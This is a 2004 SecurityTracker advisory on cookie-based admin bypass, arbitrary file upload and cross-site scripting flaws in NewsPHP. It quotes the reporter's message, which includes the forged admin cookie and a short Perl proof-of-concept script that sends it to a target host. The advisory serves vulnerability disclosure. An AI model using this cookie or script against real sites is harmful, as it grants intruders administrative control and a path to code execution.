NewsPHP Authentication Flaw Lets Remote Users Gain Administrative Access
SecurityTracker Alert ID: 1009740|
SecurityTracker URL: http://securitytracker.com/id/1009740
(Links to External Site)
Date: Apr 12 2004
Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network|
Exploit Included: Yes |
Manuel Lopez reported several vulnerabilities in NewsPHP. A remote user can gain administrative access on the application. A remote authenticated administrator can upload arbitrary files. Cross-site scripting attacks are also possible.|
It is reported that the software does not properly validate user-supplied cookies to authenticate administrative users. A remote user can reportedly supply the following cookie to gain administrative access:
A demonstration exploit script is provided in the Source Message.
It is also reported that a remote authenticated administrator (or a remote user that has exploited the above described authentication vulnerability) can invoke the File Upload feature to upload arbitrary files instead of video files. The remote user can then load a URL to cause the uploaded file to be executed by the web server with the privileges of the web server.
It is also reported that the software does not properly filter HTML code from user-supplied input in the 'cat_id' parameter. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the NewsPHP software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
A demonstration exploit URL is provided:
The vendor was reportedly notified on April 3, 2004.
A remote user can gain administrative access on the application.|
A remote authenticated administrator can upload arbitrary files to the target system and execute them with the privileges of the web server.
A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the NewsPHP software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
No solution was available at the time of this entry.|
Vendor URL: www.newsphp.com/ (Links to External Site)
Access control error, Authentication error, Input validation error|
|Underlying OS: Linux (Any), UNIX (Any), Windows (Any)|
This archive entry has one or more follow-up message(s) listed below.|
Source Message Contents
Subject: XSS, Admin Access via Cookie and File Upload vulnerability in NewsPHP.|
#Title: XSS, Admin Access via Cookie and File Upload vulnerability in
#Software: NewsPHP (All versions)
#Underlying OS: All
NewsPHP is a perfect solution for creating web publishing system, like an
online magazine, newspaper, TV/Radio or news portals. It works also as a
Content Management System that is easy to install and manage without having
to FTP upload your pages every time you need to update it.
A security vulnerability in the product allows attackers to cause the
product to think they are administrators by placing a fake Administrator
cookie on their computer.
A File Upload vulnerability in the Admin panel allow authenticated users
upload arbitrary files instead of a video file.
This product also is vulnerable to the Cross-Site Scripting vulnerability.
The flaw is caused because cookie data is not properly checked for
This is the cookie and POC to gain administrator privileges in newsPHP:
### autorized=admin; root=admin ###
## PROOF OF CONCEPT (Admin Access via Cookie in NewsPHP) ##------------
## Example: POCnws.pl www.vulnerweb.com newsadmin POCnws.htm
if (@ARGV < 3)
print "PROOF OF CONCEPT (Admin Access via Cookie in NewsPHP)\n\n";
print "Usage: POCnws.pl [host] [directory] [file.htm]\n\n";
print "By: Manuel Lopez mantra at gulo.org\n";
$host = $ARGV;
$directorio = $ARGV;
$fichero = $ARGV;
print "----- Conecting .. <====\n\n";
$socket = IO::Socket::INET->new(Proto => "tcp",
PeerAddr => "$host",PeerPort => "80") || die "$socket error $!";
print "====> Conected\n";
print "====> Sending Data .. \n";
$socket->print(<<fin) or die "write: $!";
GET http://$host/$directorio/ HTTP/1.1
Cookie: autorized=admin; root=admin
print "====> OK\n";
print "====> Generating $fichero ...\n";
open( Result, ">$fichero");
print Result while <$socket>;
A remote user can conduct cross-site scripting attacks due to an input
validation flaw in cat_id variable.
#File Upload vulnerability#
An user with privileges can upload executable code instead of a video in the
Administration Panel. Once the code has been uploaded an user can execute
the code by calling the file, this will be executed with the privileges of
the web server.
There is no solution at the moment.
Vendor contacted Apr 3 2004
Manuel Lopez, firstname.lastname@example.org